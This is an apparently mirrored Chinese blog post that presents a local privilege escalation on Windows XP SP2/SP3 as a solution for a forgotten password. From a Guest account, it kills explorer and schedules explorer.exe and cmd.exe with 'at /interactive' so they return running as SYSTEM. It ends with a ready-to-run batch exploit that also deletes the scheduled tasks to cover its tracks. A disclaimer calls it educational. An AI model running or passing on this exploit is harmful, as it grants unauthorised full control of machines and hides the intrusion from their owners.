zoukankan      html  css  js  c++  java
  • 忘记XP密码的解决方案

    仅供教学与研究用,后果自负!
    !! USE AT YOUR OWN RISK !!
    !! ONLY FOR EDUCATIONAL PURPOSE !!

    介绍

    获取SYSTEM权限。测试通过。

    1. 进入Guest账户
      假如连Guest账户都没有,那么此方法不适用。可以用光盘启动便携系统,更改密码文件。

    2. 删除explorer进程:

    :l
    tskil explorer
    goto l
    
    1. 建立任务计划:不久后运行explorer
    at T /interactive explorer.exe
    

    T代表一段时间后(可以通过通过time.exe获取当前时间)

    explorer.exe再次启动后,当前登录账户会变为SYSTEM。

    重启后将恢复原状。

    Demo

    @echo off
    echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
    start time /T > time.txt
    tskill explorer
    time 13:36:59 > nul
    at 13:37 /interactive cmd.exe
    at 13:37 /interactive explorer.exe
    at 13:37 /interactive at /del /y
    cls
    at 13:37 /interactive cmd.exe
    at 13:37 /interactive explorer.exe
    at 13:37 /interactive at /del /y
    cls
    at 13:37 /interactive cmd.exe
    at 13:37 /interactive explorer.exe
    at 13:37 /interactive at /del /y
    cls
    at 13:37 /interactive cmd.exe
    at 13:37 /interactive explorer.exe
    at 13:37 /interactive at /del /y
     
     
    echo [*] Backup time
    time < time.txt
    
  • 相关阅读:
    正则表达式口诀
    Ajax请求的四种方式
    jQuery插件 -- jQuery UI插件
    电脑操作技巧
    递归
    声纹识别环境初次搭建
    视频编码book_实战_全角度——1
    SDK等阅读笔记
    音视频bug调试
    音视频开发进阶指南(二)
  • 原文地址:https://www.cnblogs.com/jt2001/p/microsoft-winxp-sp2sp3-local-system-privilege-escalation-exploit.html
Copyright © 2011-2022 走看看